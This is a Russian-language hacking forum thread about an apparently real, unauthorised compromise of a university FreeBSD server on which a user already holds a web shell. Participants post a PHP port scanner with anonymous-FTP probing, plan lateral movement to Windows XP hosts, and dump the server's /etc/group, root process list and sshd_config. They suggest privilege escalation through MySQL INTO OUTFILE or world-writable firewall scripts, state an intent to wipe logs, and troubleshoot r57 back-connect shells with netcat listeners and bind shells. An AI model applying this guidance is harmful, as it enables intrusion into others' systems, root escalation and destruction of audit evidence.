Как вариант рассуждаем: У нас есть сервак и походу он является университетским тоесть состоит в сети 192.168.0/24. Вполне возможно и даже скорее всего что в этой сети юзаются компы с Windows Xp и вполне возможно есть дырявая. Проверяем сервак на предмет наличия популярных сканеров портов и если есть то сканим всю поддсеть, если нет то выход может быть такой Code: Источник кода security-teams.ne ##################################################### #!/usr/local/bin/php <? class thread { function sock($net,$p) { @$sock = fsockopen($net,$p,$errno, $errstr,5); if($sock == true) {print $p." - open\n";} else { print $p." - close\n"; } if($p == 21) $this->ftp_valid($sock); else; @fclose($sock); } function self($line) { list($code,$mesg)=split(' ',$line,2); print $code." ".$mesg."\r\n"; return $code; } function ftp_valid($sock) { print "#############проверка на анонимный FTP доступ############\n"; $line=fgets($sock); $code = $this->self($line); if($code == 220) { fwrite($sock,"user anonymous\r\n"); $line=fgets($sock); $code = $this->self($line); if($code == 331) { fwrite($sock,"pass [email protected]\r\n"); $line=fgets($sock); $code = $this->self($line); } else; } else; print "##############################################################\n"; } function open_relay($sock) { } } if(empty($argv[2])) {$port = array(21,22,23,24,25,80,81,110,143,135,139,445,3306,3124,3128,3389,8080);} elseif($argv[2]=="all") { $j=1; while($j<=10000) { $port[]=$j; $j++; } } else { print "Wrong parametr!!!\n";} $object = new thread(); $i = 0; if(!empty($argv[1])) { $host = $argv[1]; print "Host $host is scanned....\n"; while(isset($port[$i])) { $p = $port[$i]; $object->sock($host,$p); $i++; } } else; ?> ##################################################### $ ./ports.php [Адрес жертвы] [port [all]] | grep open Ищем машины с портами которые как правило юзаются виндами и далее пробуем сплойтами пробить машинку + при удаче установить консольный SSH клиент и юзать связку WebShell -> Телнет Винды --> SSH WEB сервака Примерно так.. При условии что SSH тупо не забит только на один IP админа.
Code: cat /etc/group # $FreeBSD: src/etc/group,v 1.35 2007/06/11 18:36:39 ceri Exp $ # wheel:*:0:root daemon:*:1: kmem:*:2: sys:*:3: tty:*:4: operator:*:5:root mail:*:6:postfix bin:*:7: news:*:8: man:*:9: games:*:13: ftp:*:14: staff:*:20: sshd:*:22: smmsp:*:25: mailnull:*:26: guest:*:31: bind:*:53: proxy:*:62: authpf:*:63: _pflogd:*:64: _dhcp:*:65: uucp:*:66: dialer:*:68: network:*:69: audit:*:77: www:*:80: nogroup:*:65533: nobody:*:65534: messagebus:*:556: polkit:*:562: mgradmin:*:1000: mgrreseller:*:1001: mgrsecure:*:1002:user_ugkp,user_gras,user_smart,user_gm144 cyrus:*:60: postfix:*:125: maildrop:*:126: dovecot:*:143: mysql:*:88: user_ugkp:*:1004: user_gras:*:1005: user_smart:*:1006: fetchmail:*:124: squid:*:100: cups:*:193: user_gm144:*:1007: Code: cat /etc/sudoers cat: /etc/sudoers: No such file or directory Code: id uid=1026(user_gm144) gid=1007(user_gm144) groups=1007(user_gm144),1002(mgrsecure) Что дальше?
Знаю =) Кстати этот сервер тебе уже поиграться только, утром админ спалит ибо наследил уже хорошо (при учете что админ там есть и ему не пофигу) Code: ls -l /etc/ssh Вывод в студию. Иногда встречаються серваки у которых на sshd_config встречаються права 777 =) кстати заодно и Code: cat /etc/ssh/sshd_config
ТС, бросай все это, размагничивай и сжигай комп пока не поздно, хотя.... кароче, наверное, уже выехали
не пугай так ТС, все когдато игрались =) И все же мне очень интересно какой там админ, шелл завтра снесут или будет жить =)
Шелл уже 3 дня живёт. И забыл написать, что имею доступ из-под рута к MySQL. Может получиться через MySQL сделать ту запись в файл, чтобы зайти под рута? Рут мне нужен что бы не просто поиграться. Логи ведь надо почистить все...
Вот: Code: [COLOR=White][B]ps -U root[/B][/COLOR] PID TT STAT TIME COMMAND 0 ?? WLs 0:00.01 [swapper] 1 ?? SLs 0:00.01 /sbin/init -- 2 ?? DL 0:08.57 [g_event] 3 ?? DL 0:15.62 [g_up] 4 ?? DL 0:16.88 [g_down] 5 ?? DL 0:00.00 [thread taskq] 6 ?? DL 0:00.00 [acpi_task_0] 7 ?? DL 0:00.00 [acpi_task_1] 8 ?? DL 0:00.00 [acpi_task_2] 9 ?? DL 0:00.00 [xpt_thrd] 10 ?? DL 0:00.00 [audit] 11 ?? RL 5588:57.04 [idle: cpu3] 12 ?? RL 5588:40.67 [idle: cpu2] 13 ?? RL 5572:06.55 [idle: cpu1] 14 ?? RL 5521:42.77 [idle: cpu0] 15 ?? WL 63:37.48 [swi4: clock sio] 16 ?? WL 0:00.00 [swi3: vm] 17 ?? WL 0:00.90 [swi1: net] 18 ?? DL 0:08.80 [yarrow] 19 ?? WL 0:00.02 [swi5: +] 20 ?? WL 0:00.00 [swi6: Giant taskq] 21 ?? WL 0:00.00 [swi6: task queue] 22 ?? WL 0:03.67 [swi2: cambio] 23 ?? DL 0:00.00 [kqueue taskq] 24 ?? WL 0:00.00 [irq9: acpi0] 25 ?? WL 0:01.72 [irq16: mpt0] 26 ?? DL 0:00.00 [mpt_recovery0] 27 ?? DL 0:05.90 [em0 taskq] 28 ?? DL 0:25.32 [em1 taskq] 29 ?? WL 0:00.00 [irq23: uhci0 uhci+] 30 ?? DL 0:00.05 [usb0] 31 ?? DL 0:00.00 [usbtask-hc] 32 ?? DL 0:00.00 [usbtask-dr] 33 ?? WL 0:00.00 [irq22: uhci1 uhci3] 34 ?? DL 0:00.05 [usb1] 35 ?? DL 0:00.05 [usb2] 36 ?? DL 0:00.05 [usb3] 37 ?? DL 0:00.05 [usb4] 38 ?? WL 0:00.00 [irq14: ata0] 39 ?? WL 0:00.00 [irq15: ata1] 40 ?? WL 0:00.00 [irq20: atapci1] 41 ?? WL 0:00.00 [swi0: sio] 42 ?? WL 0:00.00 [irq1: atkbd0] 43 ?? WL 0:00.01 [irq12: psm0] 44 ?? DL 0:00.00 [sctp_iterator] 45 ?? DL 0:00.55 [pagedaemon] 46 ?? DL 0:00.00 [vmdaemon] 47 ?? DL 0:00.01 [pagezero] 48 ?? DL 0:01.33 [bufdaemon] 49 ?? DL 0:01.36 [vnlru] 50 ?? DL 8:25.24 [syncer] 51 ?? DL 0:02.00 [softdepflush] 52 ?? DL 0:14.95 [schedcpu] 142 ?? Is 0:00.00 adjkerntz -i 430 ?? Is 0:00.22 /sbin/devd 844 ?? Ss 0:02.34 /usr/sbin/syslogd -l /var/run/log -l /var/named/var/r 1149 ?? Is 0:08.51 /usr/local/libexec/postfix/master 1173 ?? Ss 0:07.31 /usr/local/sbin/dovecot 1174 ?? S 0:08.80 dovecot-auth 1182 ?? Ss 0:05.90 /usr/local/sbin/httpd -DNOHTTPACCEPT 1208 ?? Is 0:00.24 /usr/sbin/sshd 1213 ?? Ss 0:00.93 /usr/sbin/cron -s 1228 ?? Is 0:00.27 /usr/sbin/moused -p /dev/psm0 -t auto 1255 ?? Is 0:00.28 /usr/sbin/inetd -wW -C 60 6163 ?? S 0:00.59 /usr/local/ispmgr/bin/ispmgr 1276 v0 Is+ 0:00.00 /usr/libexec/getty Pc ttyv0 1277 v1 Is+ 0:00.00 /usr/libexec/getty Pc ttyv1 1278 v2 Is+ 0:00.00 /usr/libexec/getty Pc ttyv2 1279 v3 Is+ 0:00.00 /usr/libexec/getty Pc ttyv3 1280 v4 Is+ 0:00.00 /usr/libexec/getty Pc ttyv4 1281 v5 Is+ 0:00.00 /usr/libexec/getty Pc ttyv5 1282 v6 Is+ 0:00.00 /usr/libexec/getty Pc ttyv6 1283 v7 Is+ 0:00.00 /usr/libexec/getty Pc ttyv7 1097 con- S+ 0:25.53 /usr/local/bin/samsdaemon Code: [COLOR=White][B]ls -l /etc/ssh[/B][/COLOR] total 296 -rw-r--r-- 1 root wheel 132839 Feb 24 2008 moduli -rw-r--r-- 1 root wheel 1533 Feb 24 2008 ssh_config -rw------- 1 root wheel 668 Jul 31 14:14 ssh_host_dsa_key -rw-r--r-- 1 root wheel 595 Jul 31 14:14 ssh_host_dsa_key.pub -rw------- 1 root wheel 520 Jul 31 14:14 ssh_host_key -rw-r--r-- 1 root wheel 324 Jul 31 14:14 ssh_host_key.pub -rw------- 1 root wheel 1675 Jul 31 14:14 ssh_host_rsa_key -rw-r--r-- 1 root wheel 387 Jul 31 14:14 ssh_host_rsa_key.pub -rw-r--r-- 1 root wheel 3241 Aug 5 11:55 sshd_config Code: [COLOR=White][B]cat /etc/ssh/sshd_config[/B][/COLOR] # $OpenBSD: sshd_config,v 1.74 2006/07/19 13:07:10 dtucker Exp $ # $FreeBSD: src/crypto/openssh/sshd_config,v 1.47 2006/11/10 16:52:41 des Exp $ # This is the sshd server system-wide configuration file. See # sshd_config(5) for more information. # This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin # The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options change a # default value. # Note that some of FreeBSD's defaults differ from OpenBSD's, and # FreeBSD has a few additional options. #VersionAddendum FreeBSD-20061110 #Port 22 #Protocol 2 #AddressFamily any #ListenAddress 0.0.0.0 #ListenAddress :: # HostKey for protocol version 1 #HostKey /etc/ssh/ssh_host_key # HostKeys for protocol version 2 #HostKey /etc/ssh/ssh_host_dsa_key # Lifetime and size of ephemeral version 1 server key #KeyRegenerationInterval 1h #ServerKeyBits 768 # Logging # obsoletes QuietMode and FascistLogging #SyslogFacility AUTH #LogLevel INFO # Authentication: #LoginGraceTime 2m #PermitRootLogin no #StrictModes yes #MaxAuthTries 6 #RSAAuthentication yes #PubkeyAuthentication yes #AuthorizedKeysFile .ssh/authorized_keys # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts #RhostsRSAAuthentication no # similar for protocol version 2 #HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # RhostsRSAAuthentication and HostbasedAuthentication #IgnoreUserKnownHosts no # Don't read the user's ~/.rhosts and ~/.shosts files #IgnoreRhosts yes # Change to yes to enable built-in password authentication. PasswordAuthentication yes #PermitEmptyPasswords no # Change to no to disable PAM authentication #ChallengeResponseAuthentication yes # Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes #KerberosGetAFSToken no # GSSAPI options #GSSAPIAuthentication no #GSSAPICleanupCredentials yes # Set this to 'no' to disable PAM authentication, account processing, # and session processing. If this is enabled, PAM authentication will # be allowed through the ChallengeResponseAuthentication and # PasswordAuthentication. Depending on your PAM configuration, # PAM authentication via ChallengeResponseAuthentication may bypass # the setting of "PermitRootLogin without-password". # If you just want the PAM account and session checks to run without # PAM authentication, then enable this but set PasswordAuthentication # and ChallengeResponseAuthentication to 'no'. #UsePAM yes #AllowTcpForwarding yes #GatewayPorts no #X11Forwarding yes #X11DisplayOffset 10 #X11UseLocalhost yes #PrintMotd yes #PrintLastLog yes #TCPKeepAlive yes #UseLogin no #UsePrivilegeSeparation yes #PermitUserEnvironment no Compression yes #ClientAliveInterval 0 #ClientAliveCountMax 3 #UseDNS yes #PidFile /var/run/sshd.pid #MaxStartups 10 #PermitTunnel no # no default banner path #Banner /some/path # override default of no subsystems Subsystem sftp /usr/libexec/sftp-server # Example of overriding settings on a per-user basis #Match User anoncvs # X11Forwarding no # AllowTcpForwarding no # ForceCommand cvs server А доступ к мускулу с правами рута что ли ничего не даёт? Например через into outfile подредактировать файл /etc/group.
Для этого процесс мускуля должен быть запущен из под рута ну и иметь его права =) Поэтому и просил у тебя ps -U чтобы просмотреть а не запущен ли SSH имеет обычную парольную аутентификацию снаружи закрыт фаерволом. Еще наводка : Поищи в /etc/ скриптик с правилами фаервола, при настройке частенько на него ставят 777 и иногда забывают снять. О.. как называется скрипт можеш глянуть в /etc/rc.conf
cat /etc/firewall.conf 50928 -rw------- 1 root wheel 0 Oct 8 09:53 firewall.conf Error! Can't read file /etc/firewall.conf Вот так вот =| Значит облом мне с рутом? =(
Приветствую всех! Подскажите, пожалуйста, пытаюсь сделать бэкконнект через r57. Запускаю NetCat, ввожу nc -l -p 11457, нажимаю Enter и NetCat исчезает. Далее в самом шелле ничего не меняю в настройках бэкконнекта (порт 11457 и IP здесь всё верно). Жму "Выполнить" и шелл отдаёт мне следующее: "Now script try connect to (здесь IP) port 11457 ..." Пробовал это сделать на нескольких шеллах и так абсолютно на всех шеллах. У себя файрвол отключаю.
Если ssh закрыт фаером то нам поможет датапайп не? или тупо конектим к бинд шелу а оттуда конектим к ssh.
Пожалуйста, также выкладывайте инфу о вашем подключении к Глобальной сети, ADSL, Dial-UP, Sity Local Network и т.д. Если юзаете локалку то вполне возможно что на шлюзе порезано все что только можно.
Добрый вечер Странно, когда я ввожу логин и пароль - ssh (putty) и программа сразу выходит. Что делать?